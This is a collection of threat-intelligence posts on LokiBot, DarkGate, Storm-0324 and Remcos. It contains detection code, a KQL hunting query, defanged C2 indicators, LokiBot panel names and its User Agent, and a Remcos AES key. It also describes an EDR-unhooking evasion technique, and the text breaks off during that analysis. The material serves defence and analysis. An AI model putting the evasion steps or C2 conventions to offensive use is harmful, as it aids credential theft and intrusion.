LokiBot first surfaced in March of 2015 on underground hacking forums by a hacker with an alias of “lokistov”, who is also known as “Carter”. This can be seen in Figure 1, where LokiBot was originally posted on an underground form. LokiBot was originally advertised as a “Resident Loader and Password and CryptoCoin-wallet stealer.” It is assumed that lokistov is from a non-English speaking country, specifically an ex-USSR country. LokiBot was being sold for upwards of $450 USD or $540 USD in the current economy this report was written, depending on whether the buyer wanted the stealer or the loader, as well as other add-ons such as a change in the C2 (Command and Control) IP address. After release, every week lokistov would publish an update until 2017, when lokistov released LokiBot V2. Since then, they have not updated the forums for LokiBot V1. Shortly after, the LokiBot source code was leaked around 2018 and is now being sold on forums for as low as $80 USD. There are two theories of how this happened. One is that somebody reversed the original LokiBot and gathered the source code, then published the cracked version of the malware. The other theory is that lokistov got hacked themselves, and the hacker published the stolen version.
Figure 1: Original Posting of LokiBot by Lokistov.
LokiBot became a popular malware choice for threat actors due to the low price and ease of use. Since then, lokistov has released LokiBot 2.0 and is currently selling it on underground forums. This newer version of the Information Stealer includes more evasive techniques and expands further into Keylogger, Remote Access Trojan (RAT), and even ransomware attributes.
Notable Uses
Because LokiBot has been around for a while, there have been a sizeable number of media pieces about it; however, none of them cover the campaigns that APT (Advanced Persistent Threat) groups are using this malware to conduct. The most recent use was in February of 2020, where LokiBot impersonated a Fortnite launcher, which was one of the most popular video games at the time.
Since LokiBot is simple, adaptable and easily accessible, this malware has remained in the top 5 malware families seen at Cofense since 2019. During 2019 and 2020, LokiBot was a high competitor for the top malware family seen, constantly switching places with the ever-popular Agent Tesla.
Capabilities
Although LokiBot originated as an Information Stealer, it has been cracked and edited several times. LokiBot can have RAT or keylogger capabilities. However, the majority of LokiBot seen in the wild only demonstrates Information Stealer capabilities. LokiBot is capable of stealing credentials from over 100 different clients, including but not limited to:
Email Clients
FTP Clients
VNC Clients
HTTP Browsers
Password Managers
IM Clients
Specific examples of what these applications are can be found in Table 1, however the list is not limited to just these specific applications.
Mozilla Firefox
Internet Explorer
Google Chrome
K-Meleon
Comodo Dragon
SeaMonkey
Safari
CoolNovo
Opera
Chromium
Titan Browser
Yandex Browser
Superbird Browser
Chrome Canary
Waterfox
Flash FXP
Nexus File
JaSFtp
Syncovery
Remmia RDP
FileZilla
CyberDuck
NovaFTP
FTPShell
NETFile
mSecure Wallet
Fling
KiTTY
PuTTY
WinSCP
Outlook
Mozilla Thunderbird
Pocomail
Gmail Notifier Pro
yMail
Pidgin
AI RoboForm
KeePass
EnPass
1Password
Table 1: List of examples that LokiBot has the capability to steal from.
In the Wild
LokiBot has always been seen at Cofense as one of the most popular malware families used by threat actors. Due to its simplistic nature and usage, low-skill threat actors can use LokiBot for a variety of malicious purposes. In 2019 up until around 2021, LokiBot would often be the most common malware family, followed by Agent Tesla Keylogger. At the time of this report, other malware families have appeared more often, and therefore pushed LokiBot down in the rankings. However, LokiBot is still in the top five malware families seen at Cofense. Figure 2 shows the percentage of LokiBot malware seen among other malware families in our Active Threat Reports (ATR), and although there was a small dip over the past year and a half, LokiBot has remained around eight percent of all malware seen each month.
Figure 2: Loki Bot’s relative value seen at Cofense between January 2022 and July 2023.
Delivery Mechanisms
LokiBot is often seen by itself when it is delivered via email, however, as can be seen in Figure 2, there is still quite a large amount of LokiBot that is accompanied by a delivery mechanism. Out of the delivery mechanisms seen by Cofense, an overwhelming 82% of LokiBot accompanied by a delivery mechanism is delivered by CVE-2017-11882. However, out of all the LokiBot samples seen by Cofense, over half of the LokiBots are seen delivered as a direct attachment.
Figure 3: Delivery Mechanisms used to deliver Loki Bot between January 2022 and July 2023.
LokiBot is very rarely delivered via embedded URLs or via delivery mechanisms other than CVE-2017-11882, such as Visual Basic Scripts (VBS) or Windows Shortcut Files (LNK): just over one percent of LokiBot samples seen between January 2022 and July 2023 were delivered via those two mechanisms combined.
Behavior
LokiBot has a very straightforward and simplistic way of behaving. Once LokiBot has been downloaded and run, LokiBot will unpack itself onto the system. From there, this malware will start collecting sensitive information from each of the programs it supports gathering information from. Once LokiBot has exhausted all the possible applications that can give the sensitive data, as well as any extra additions such as keystroke logging, it will create a customized HTTP packet and send it to the C2, as seen in Figure 4. As LokiBot is gathering the information into an HTTP packet, some versions of LokiBot will start to maintain persistence, while others may continue to run and occasionally connect in case any new credentials are stored on the machine.
Figure 4: Example of an HTTP POST request from a computer infected with LokiBot.
This specific link is the final destination, where the information is presented to the threat actor. If one were to visit the page, they would be greeted with a captcha as well as a login page as seen in Figure 5.
Figure 5: Example of a LokiBot C2 Authentication Panel.
Detection and Hunting
LokiBot heavily depends on connecting to its C2, which generally makes it easy to spot. Due to the low volume of embedded URLs delivering LokiBot, the primary way to prevent LokiBot from being installed on a system is to not allow unknown downloads from suspicious emails. Most anti-virus software is good at catching LokiBot due to its simplicity, but there are also other ways to spot whether LokiBot is already installed on a system.
User Agent
LokiBot can also be identified by a specific string found in the application as well as the network traffic. LokiBot will always use the User Agent “Mozilla/4.08 (Charon; Inferno)” to connect to its C2s, as seen in Figure 4.
Network Traffic
As previously mentioned, LokiBot will use the User Agent “Mozilla/4.08 (Charon; Inferno)” to post the credentials to its C2 Panel. LokiBot primarily uses only HTTP to communicate with its C2. There are a variety of ways the URL can be formatted, but it typically ends either with a PHP panel file name or with “p=” followed by a unique set of numbers that differentiates the systems LokiBot has infected. An example of the latter that Cofense has previously reported is:
“hxxp216[.]128[.]145[.]196/~wellseconds/?p=”
A more common example is the other IOC mentioned, the PHP panel, whose URL looks similar to:
“hxxp194[.]55[.]224[.]9/fresh1/five/fre[.]php”
fre.php
gate.php
aaaj.php
nimda.php
ight.php
crkk.php
free.php
wish.php
base.php
fred.php
mono.php
mime.php
Table 3: Examples of PHP Panels that have been seen as a C2 for Loki Bot.
The examples listed in Table 3 are not an exhaustive list of all panel PHPs as LokiBot can change the name of the PHP panel. However, the majority of LokiBot will use “fre.php” when connecting to its host.
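The two network indicators described above (the fixed User Agent and the panel-style or “p=” URLs) are easy to turn into a hunting rule. The following is an added example, not Cofense's code: it runs those checks over a few constructed proxy log lines (the IPs and paths are made up for the example and are not indicators from the report) and reports which lines trip which indicator. The panel names come from Table 3; as the text notes, that list is not exhaustive, so the User Agent match is the stronger signal.

```python
import re
from typing import Dict, List

# Fixed User Agent LokiBot uses for every C2 connection (from the report).
LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"

# PHP panel names listed in Table 3. Operators can rename the panel, so treat
# a miss here as "unknown", not "clean".
PANEL_NAMES = {
    "fre.php", "gate.php", "aaaj.php", "nimda.php", "ight.php", "crkk.php",
    "free.php", "wish.php", "base.php", "fred.php", "mono.php", "mime.php",
}

# The other URL shape: ".../?p=<digits>" carrying a per-victim identifier.
P_PARAM_RE = re.compile(r"[?&]p=\d+$")

# Constructed sample proxy log (timestamp, client IP, method, URL, user agent).
# Addresses are documentation ranges; nothing here is a real IoC.
SAMPLE_LOG = """\
2023-09-07T10:01:02Z 10.0.0.12 POST http://203.0.113.5/fresh1/five/fre.php "Mozilla/4.08 (Charon; Inferno)"
2023-09-07T10:01:05Z 10.0.0.13 GET http://example.com/index.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2023-09-07T10:02:11Z 10.0.0.14 POST http://198.51.100.7/~wellseconds/?p=1234567 "Mozilla/4.08 (Charon; Inferno)"
2023-09-07T10:03:40Z 10.0.0.15 POST http://198.51.100.9/shop/gate.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2023-09-07T10:04:00Z 10.0.0.16 GET http://example.org/free.php?id=1 "curl/8.0.1"
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)


def classify(line: str) -> Dict[str, object]:
    """Parse one log line and list the LokiBot indicators it matches."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "reasons": []}
    url = m.group("url")
    path = url.split("?", 1)[0]
    basename = path.rsplit("/", 1)[-1]
    reasons: List[str] = []
    if m.group("ua") == LOKIBOT_USER_AGENT:
        reasons.append("user-agent")
    # Panel names only matter when data is being POSTed to them.
    if basename in PANEL_NAMES and m.group("method") == "POST":
        reasons.append("panel-post")
    if P_PARAM_RE.search(url):
        reasons.append("p-param")
    return {"parsed": True, "src": m.group("src"), "url": url, "reasons": reasons}


def hunt(log_text: str) -> List[Dict[str, object]]:
    """Return the parsed entries that trip at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = classify(line)
        if entry["reasons"]:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(h["src"], h["url"], ",".join(h["reasons"]))
```

On the sample above, three of the five lines are flagged: the POST to fre.php (User Agent and panel name), the POST to the “p=” URL (User Agent and identifier parameter) and the POST to gate.php (panel name only). The GET for free.php?id=1 is not flagged, which is the intended behaviour: a panel file name by itself, fetched with a normal browser agent, is too weak to act on.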
The post LokiBot – Phishing Malware Baseline appeared first on Cofense.
Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But Malwarebytes also found DarkGate reloaded via malvertising and SEO poisoning campaigns.
A cybercriminal who goes by the handle RastaFarEye has been advertising DarkGate Loader on cybercrime forums since June 16, 2023. Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing.
What’s new is that the researchers found evidence of a campaign using Microsoft Teams to deliver the DarkGate Loader.
“On August 29, in the timespan from 11:25 to 12:25 UTC, Microsoft Teams chat messages were sent from two external Office 365 accounts compromised prior to the campaign. The message content aimed to social engineer the recipients into downloading and opening a malicious file hosted remotely.”
The distributed link initially points to a traffic distribution system (TDS). If the requirements set by the attacker are met, the TDS will redirect the victim user to the final payload URL for the MSI download. When the user opens the downloaded MSI file, the DarkGate infection is triggered.
The download locations observed in the Teams attacks were sharepoint.com URLs hosting .zip files with names like “Changes to the vacation schedule.zip.” The ZIP file contains a malicious LNK file (shortcut) posing as a PDF document: “Changes to the vacation schedule.pdf.lnk.”
Clicking the shortcut executes a command line which triggers the download and execution of a renamed cURL (a command-line tool for getting or sending data including files using URL syntax) to download and execute Autoit3.exe and a bundled script. The pre-compiled AutoIT script hides the code in the middle of the file and, on execution, drops a new file that contains shellcode.
When the shellcode is run, the first thing it does is use the “byte by byte” technique, also known as stacked strings, to create a new file: a Windows executable identified as DarkGate Loader.
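The lure in this chain is an archive whose only payload is a shortcut named to look like a PDF. As an added example (not Malwarebytes' code), the check below scans a ZIP for exactly that pattern: a member whose final extension executes on Windows while the extension before it looks like a document, plus any bare .lnk, which a genuine document bundle has no reason to carry. The archive it scans is constructed in memory with inert placeholder bytes; the extension lists are assumptions for the example and should be extended for your environment.

```python
import io
import zipfile
from typing import List

# Final extensions that execute on double-click (assumed list for the example).
EXECUTABLE_EXTS = {"lnk", "exe", "scr", "js", "vbs", "bat", "cmd", "msi", "hta", "ps1"}
# Extensions that make a file name look like an ordinary document or image.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def suspicious_entries(zip_bytes: bytes) -> List[str]:
    """Return member names that look like documents but would execute.

    Flags 'report.pdf.lnk' style names (document-looking inner extension,
    executable final extension) and any shortcut (.lnk) at all.
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.rsplit("/", 1)[-1]
            parts = name.lower().split(".")
            if len(parts) < 2:
                continue  # no extension at all
            final_ext = parts[-1]
            inner_ext = parts[-2] if len(parts) >= 3 else None
            if final_ext == "lnk":
                flagged.append(info.filename)
            elif final_ext in EXECUTABLE_EXTS and inner_ext in DOCUMENT_EXTS:
                flagged.append(info.filename)
    return flagged


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the lure layout; contents are inert text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Changes to the vacation schedule.pdf.lnk", b"not a real shortcut")
        zf.writestr("readme.txt", b"benign text")
        zf.writestr("photos/holiday.jpg.scr", b"not a real screensaver")
        zf.writestr("invoice.pdf", b"%PDF-1.4 placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for member in suspicious_entries(build_sample_zip()):
        print("suspicious:", member)
```

The check is deliberately name-based so it can run at the mail gateway before anything is extracted; pairing it with a rule that a shortcut inside an attachment is always quarantined catches this lure even when the double extension is dropped.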
Protection
Current Microsoft Teams security features such as Safe Attachments or Safe Links failed to detect or block this attack. BleepingComputer reported in June of 2023 that security researchers had found a simple way to deliver malware to an organization with Microsoft Teams, despite restrictions in the application for files from external sources. Microsoft Teams has client-side protections in place to block file delivery from external tenant accounts. But the restriction can be circumvented by changing the internal and external recipient ID in the POST request of a message, which ends up with Teams treating an external user as if it was an internal one.
The only way to prevent this attack vector within Microsoft Teams is to only allow Microsoft Teams chat requests from specific external domains. This may be troublesome in some environments since this means that all trusted external domains need to be whitelisted by an IT administrator.
Malwarebytes customers are protected against this attack as Malwarebytes blocks the C2 server hosting the downloaded files. Malwarebytes detects the LNK file and the scripts as Trojan.DarkGate.
Malwarebytes blocks 5.188.87.58
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment. Beginning in July 2023, Storm-0324 was observed distributing payloads using an open-source tool to send phishing lures through Microsoft Teams chats. This activity is not related to the Midnight Blizzard social engineering campaigns over Teams that we observed beginning in May 2023. Because Storm-0324 hands off access to other threat actors, identifying and remediating Storm-0324 activity can prevent more dangerous follow-on attacks like ransomware.
Storm-0324 (DEV-0324), which overlaps with threat groups tracked by other researchers as TA543 and Sagrid, acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. Storm-0324’s tactics focus on highly evasive infection chains with payment and invoice lures. The actor is known to distribute the JSSLoader malware, which facilitates access for the ransomware-as-a-service (RaaS) actor Sangria Tempest (ELBRUS, Carbon Spider, FIN7). Previous distribution activity associated with Storm-0324 included the Gozi infostealer and the Nymaim downloader and locker.
In this blog, we provide a comprehensive analysis of Storm-0324 activity, covering their established tools, tactics, and procedures (TTPs) as observed in past campaigns as well as their more recent attacks. To defend against this threat actor, Microsoft customers can use Microsoft 365 Defender to detect Storm-0324 activity and significantly limit the impact of these attacks on networks. Additionally, by using the principle of least privilege, building credential hygiene, and following the other recommendations we provide in this blog, administrators can limit the destructive impact of ransomware even if the attackers can gain initial access.
Historical malware distribution activity
Storm-0324 manages a malware distribution chain and has used exploit kit and email-based vectors to deliver malware payloads. The actor’s email chains are highly evasive, making use of traffic distribution systems (TDS) like BlackTDS and Keitaro, which provide identification and filtering capabilities to tailor user traffic. This filtering capability allows attackers to evade detection by certain IP ranges that might be security solutions, like malware sandboxes, while also successfully redirecting victims to their malicious download site.
Storm-0324’s email themes typically reference invoices and payments, mimicking services such as DocuSign, Quickbooks, and others. Users are ultimately redirected to a SharePoint-hosted compressed file containing JavaScript that downloads the malicious DLL payload. Storm-0324 has used many file formats to launch the malicious JavaScript including Microsoft Office documents, Windows Script File (WSF), and VBScript, among others.
Storm-0324 has distributed a range of first-stage payloads since at least 2016, including:
Nymaim, a first-stage downloader and locker
Gozi version 3, an infostealer
Trickbot, a modular malware platform
Gootkit, a banking trojan
Dridex, a banking trojan
Sage ransomware
GandCrab ransomware
IcedID, a modular information-stealing malware
Since 2019, however, Storm-0324 has primarily distributed JSSLoader, handing off access to ransomware actor Sangria Tempest.
Ongoing Storm-0324 and Sangria Tempest JSSLoader email-based infection chain
Figure 1. Storm-0324 JSSLoader infection chain based on mid-2023 activity
Since as early as 2019, Storm-0324 has handed off access to the cybercrime group Sangria Tempest after delivering the group’s first-stage malware payload, JSSLoader. Storm-0324’s delivery chain begins with phishing emails referencing invoices or payments and containing a link to a SharePoint site that hosts a ZIP archive. Microsoft continues to work across its platforms to identify abuse, take down malicious activity, and implement new proactive protections to discourage malicious actors from using our services.
Figure 2. Example Storm-0324 email
The ZIP archive contains a file with embedded JavaScript code. Storm-0324 has used a variety of files to host the JavaScript code, including WSF and Ekipa publisher files exploiting the CVE-2023-21715 local security feature bypass vulnerability.
When the JavaScript launches, it drops a JSSLoader variant DLL. The JSSLoader malware is then followed by additional Sangria Tempest tooling.
In some cases, Storm-0324 uses protected documents for additional social engineering. By adding the security code or password in the initial communications to the user, the lure document may acquire an additional level of believability for the user. The password also serves as an effective anti-analysis measure because it requires user interaction after launch.
Figure 3. Storm-0324 password-protected lure document
New Teams-based phishing activity
In July 2023, Storm-0324 began using phishing lures sent over Teams with malicious links leading to a malicious SharePoint-hosted file. For this activity, Storm-0324 most likely relies on a publicly available tool called TeamsPhisher. TeamsPhisher is a Python-language program that enables Teams tenant users to attach files to messages sent to external tenants, which can be abused by attackers to deliver phishing attachments. These Teams-based phishing lures by threat actors are identified by the Teams platform as “EXTERNAL” users if external access is enabled in the organization.
Microsoft takes these phishing campaigns very seriously and has rolled out several improvements to better defend against these threats. In accordance with Microsoft policies, we have suspended identified accounts and tenants associated with inauthentic or fraudulent behavior. We have also rolled out enhancements to the Accept/Block experience in one-on-one chats within Teams, to emphasize the externality of a user and their email address so Teams users can better exercise caution by not interacting with unknown or malicious senders. We rolled out new restrictions on the creation of domains within tenants and improved notifications to tenant admins when new domains are created within their tenant. In addition to these specific enhancements, our development teams will continue to introduce additional preventative and detective measures to further protect customers from phishing attacks.
Recommendations
To harden networks against Storm-0324 attacks, defenders are advised to implement the following:
Pilot and start deploying phishing-resistant authentication methods for users.
Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
Specify trusted Microsoft 365 organizations to define which external domains are allowed or blocked to chat and meet.
Keep Microsoft 365 auditing enabled so that audit records can be investigated if required.
Understand and select the best access settings for external collaboration for your organization.
Allow only known devices that adhere to Microsoft’s recommended security baselines.
Educate users about social engineering and credential phishing attacks, including refraining from entering MFA codes sent via any form of unsolicited messages.
Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
Educate users to review sign-in activity and mark suspicious sign-in attempts as “This wasn’t me”.
Implement Conditional Access App Control in Microsoft Defender for Cloud Apps for users connecting from unmanaged devices.
Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.
Enable Zero-hour auto purge (ZAP) in Microsoft Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
Practice the principle of least privilege and maintain credential hygiene. Avoid the use of domain-wide, administrator-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
For additional recommendations on hardening your organization against ransomware attacks, refer to our threat overview on human-operated ransomware.
Microsoft customers can turn on attack surface reduction rules to prevent common attack techniques:
Block executable files from running unless they meet a prevalence, age, or trusted list criterion
Block JavaScript or VBScript from launching downloaded executable content
Use advanced protection against ransomware
Detection details
Microsoft 365 Defender
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware:
TrojanSpy:MSIL/JSSLoader
Trojan:Win32/Gootkit
Trojan:Win32/IcedId
Trojan:Win64/IcedId
Trojan:Win32/Trickbot
Microsoft Defender for Endpoint
Alerts with the following titles in the security center can indicate threat activity on your network:
Ransomware-linked Storm-0324 threat activity group detected
Hunting queries
Microsoft 365 Defender
Possible TeamsPhisher downloads
The following query looks for downloaded files that were potentially facilitated by use of the TeamsPhisher tool. Defenders should customize the SharePoint domain name ('mysharepointname') in the query.
let allowedSharepointDomain = pack_array(
    'mysharepointname' // customize SharePoint domain name and add more domains as needed for your query
);
//
let executable = pack_array(
    'exe',
    'dll',
    'xll',
    'msi',
    'application'
);
let script = pack_array(
    'ps1',
    'py',
    'vbs',
    'bat'
);
let compressed = pack_array(
    'rar',
    '7z',
    'zip',
    'tar',
    'gz'
);
//
let startTime = ago(1d);
let endTime = now();
DeviceFileEvents
| where Timestamp between (startTime..endTime)
| where ActionType =~ 'FileCreated'
| where InitiatingProcessFileName has 'teams.exe'
    or InitiatingProcessParentFileName has 'teams.exe'
| where InitiatingProcessFileName !has 'update.exe'
    and InitiatingProcessParentFileName !has 'update.exe'
| where FileOriginUrl has 'sharepoint'
    and FileOriginReferrerUrl has_any ('sharepoint', 'teams.microsoft')
| extend fileExt = tolower(tostring(split(FileName, '.')[-1]))
| where fileExt in (executable)
    or fileExt in (script)
    or fileExt in (compressed)
| extend fileGroup = iff(fileExt in (executable), 'executable', '')
| extend fileGroup = iff(fileExt in (script), 'script', fileGroup)
| extend fileGroup = iff(fileExt in (compressed), 'compressed', fileGroup)
//
| extend sharePoint_domain = tostring(split(FileOriginUrl, '/')[2])
| where not (sharePoint_domain has_any (allowedSharepointDomain))
| project-reorder Timestamp, DeviceId, DeviceName, sharePoint_domain, FileName, FolderPath, SHA256, FileOriginUrl, FileOriginReferrerUrl
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.
Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.
Suspicious Javascript
Javascript file creation
Ransomware Triggered
Signs of Ransomware Activity
Suspicious Image Load
References
Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself
JSSLoader: Recoded and Reloaded (Proofpoint)
Further reading
Microsoft customers can refer to the report on this activity in Microsoft Defender Threat Intelligence and Microsoft 365 Defender for detections, assessment of impact, mitigation and recovery actions, and hunting guidance.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.
The post Malware distributor Storm-0324 facilitates ransomware access appeared first on Microsoft Security Blog.
Research by: Niv Asraf
Abstract
In the last two months, Check Point researchers encountered a new large-scale phishing campaign that recently targeted more than 40 prominent companies across multiple industries, in Colombia. The attackers’ objective was to discreetly install the notorious “Remcos” malware on victims’ computers. Remcos, a sophisticated “Swiss Army Knife” RAT, grants attackers full control over the infected computer and can be used in a variety of attacks. Common consequences of a Remcos infection include data theft, follow-up infections, and account takeover. In our report, we delve into the attack intricacies and highlight the stealthy techniques employed by the malicious actors.
Attack Flow
Fraudulent Email:
The attackers initiated the campaign by sending deceptive emails allegedly from trusted entities, including reputable financial institutions and corporations operating within Colombia. These malicious emails were crafted to appear genuine, often containing urgent notifications, reports of overdue debts, or enticing offers.
Email Contains an Archive File:
The phishing email contains an attachment that appears to be a harmless archive file, such as ZIP, RAR or TGZ. The attachment label states that it contains important documents, invoices, or other enticing information to encourage the recipients to open it.
Highly Obfuscated BAT File with PowerShell Commands:
The archive file contains a highly obfuscated Batch (BAT) file. Upon execution, the BAT file runs PowerShell commands which are also heavily obfuscated. This multi-layer obfuscation makes it difficult for security solutions to detect and analyze the malicious payload.
Loading .NET Modules:
After the PowerShell commands are deciphered, they load two .NET modules into memory. These modules are essential for the subsequent stages of the attack.
First .NET Module: Evasion and Unhooking:
The first .NET module’s primary purpose is to evade detection and unhook any security mechanisms present in the targeted system. By removing or bypassing security hooks, the attackers increase the malware’s chances of remaining undetected and enable it to operate stealthily.
Second .NET Module: Loading “LoadPE” and Remcos:
The second .NET module dynamically loads another component called “LoadPE” from the file resources. “LoadPE” is responsible for reflective loading, a technique that allows the loading of a Portable Executable (PE) file (in this case, the Remcos malware) directly into memory without the need for it to be stored on the disk.
Reflective Loading with “LoadPE”:
Using the “LoadPE” component, the attackers load the final payload, the Remcos malware, directly from their resources into the memory. This reflective loading technique further enhances the malware’s ability to evade traditional antivirus and endpoint security solutions, as it bypasses standard file-based detection mechanisms.
The Final Payload: Remcos – Swiss Army Knife RAT:
With the successful loading of the Remcos malware into memory, the attack is now complete. Remcos, a potent Remote Administration Tool (RAT), grants the attackers full control over the compromised system. It serves as a Swiss Army Knife for the attackers, allowing them to execute a wide range of malicious activities, including unauthorized access, data exfiltration, keylogging, remote surveillance, and more.
Technical Analysis
In the following sections, we examine the technical aspects of the observed issues. We focus on the malware’s evasion techniques and the deobfuscation process we employed to uncover the true nature of the BAT and .NET modules.
Our analysis starts with the malicious BAT file from attack chain stage 3 above.
After deobfuscating parts of the BAT file code with a Python script, the only thing we’re interested in is the last two lines of code:
Figure 4: The last two lines of the deobfuscated BAT file.
The first line is responsible for copying the PowerShell executable to the current folder, abusing a double extension in the filename in order to hide the true file type.
And the second line of code looks like a heavily obfuscated PowerShell code.
After we organized and deobfuscated the PowerShell code, this is what we got:
Figure 5: Deobfuscated PowerShell code.
There are two functions here:
“Zoskj” is responsible for decrypting the payload using AES CBC mode.
“oPueH” uses GZIP to decompress it.
The flow is to first decode the Base64, and then decrypt it using AES. The last step is to decompress it.
AES key: Bh25J//GchqJk6Loyw9E05onwOgPl+4pjflSE6q18Hk=
AES IV: dQVwOVWNZWJ4TULVM0QMqQ==
Finally, after resolving the two .NET executables, they are both loaded in the memory:
Figure 6: Load 2 .NET executables to the memory
We wanted to see why the attackers split the payload into two .NET executables and if there is a meaning to the order in which they are loaded.
Looking at the first .NET executable, we can see that it is highly obfuscated and almost unreadable.
Figure 7: First .NET obfuscated executable.
While this obfuscation is unknown, we can still use “de4dot” to make it a little bit more readable and then perform further deobfuscation.
de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#.
Figure 8: First .NET obfuscated executable after using de4dot.
The prominent pattern we observed involves deliberately enlarging the size of the code making it more complicated by extensively using Math.Abs/Min methods and adding numerous parentheses. Fortunately, we do not need to perform actual calculations; the values inside these methods directly serve as the final parameters passed into the “smethods_*” functions.
The first interesting thing we noticed here is the unknown strings (outlined in red in Figure 8) that are always passed into “smethod_0”. From this we understand that it is probably a string decryption function.
Looking at the function itself, we can see that only the string_0 and int_1 arguments are being used in the “for” loop, which is the only part of the code that is relevant here.
Basically, the function takes each “char” of the string, converts it to an int, subtracts the int_1 argument from it, converts the result back to a char and appends it to the “stringBuilder”.
We created our own string decryption method in Python:
Figure 10: String decryption method in Python.
In the Figure 10 example, the return value is “ntdll.dll”.
So now, we can decrypt all unknown strings.
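As an added example (not Check Point's script, whose Figure 10 is not reproduced here), the transform just described is a per-character subtraction, so it reduces to a few lines of Python. The shift value 5 and the two ciphertexts are constructed for this example; in the real sample the shift is whatever literal the call site passes as int_1 (buried inside the Math.Abs/Min noise mentioned earlier), so it is read from each call and may differ between strings.

```python
from typing import Dict, Iterable, Tuple


def decrypt_string(encrypted: str, shift: int) -> str:
    """Mirror of smethod_0: char -> int, subtract int_1, back to char."""
    out = []
    for ch in encrypted:
        out.append(chr(ord(ch) - shift))
    return "".join(out)


def encrypt_string(plain: str, shift: int) -> str:
    """Inverse transform, used only to produce test vectors for this example."""
    return "".join(chr(ord(ch) + shift) for ch in plain)


def decrypt_all(encrypted_values: Iterable[Tuple[str, str, int]]) -> Dict[str, str]:
    """Decrypt a batch of (label, ciphertext, shift) triples pulled from call sites."""
    return {label: decrypt_string(value, shift) for label, value, shift in encrypted_values}


# Constructed sample inputs: "ntdll.dll" and "CloseHandle" encoded with shift 5.
SAMPLE_SHIFT = 5
SAMPLE_ENCRYPTED = [
    ("module", "syiqq3iqq", SAMPLE_SHIFT),
    ("api", "HqtxjMfsiqj", SAMPLE_SHIFT),
]

if __name__ == "__main__":
    for label, plain in decrypt_all(SAMPLE_ENCRYPTED).items():
        print(f"{label}: {plain}")
```

Because the shift is per call rather than global, the practical workflow is to script the extraction of (string literal, int literal) pairs from each smethod_0 call and feed them through decrypt_all, then use the results to rename the delegate variables as the next section does.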
In addition, before the “Main” function executes, we see a lot of dynamically resolved functions assigned to delegated pointer variables to use in the code.
If we decrypt those strings, we can understand what the functions are, and rename the obfuscated delegated names.
Figure 11: Example of the “CloseHandle” function pointer being assigned.
After resolving and renaming, we get these function variables:
Figure 12: Decrypted delegated function pointers.
Now that we decrypted all the pointers, we can reverse-engineer the other methods and understand the flow of the main function.
Let’s analyze the function that receives the decrypted string “ntdll.dll”.
Figure 13: Choose the right ntdll based on IsWow64Process.
Looking at the first chunk of code, we can see two encrypted strings which translate to:
“C:\Windows\System32” and “C:\Windows\SysWOW64”
We also see a delegated function pointer that we resolved earlier, IsWow64Process.
This checks whether the process runs under wow64, so we can use the right ntdll to read from the disk.
Figure 14: Unhooking DLL.
Although this function is still obfuscated, we can analyze and understand the code’s purpose, which is unhooking DLLs that are received as an argument to the function.
This is what happens here:
Get a handle to the already-hooked library.
Map a fresh copy of the relevant DLL into memory.
Replace the .text section of the hooked DLL with the new one from the disk.
Figure 15: Unhooking.
VirtualProtect changes the .text section protection, memcpy copies in the fresh, unhooked section, and VirtualProtect is called again to restore the original protection.
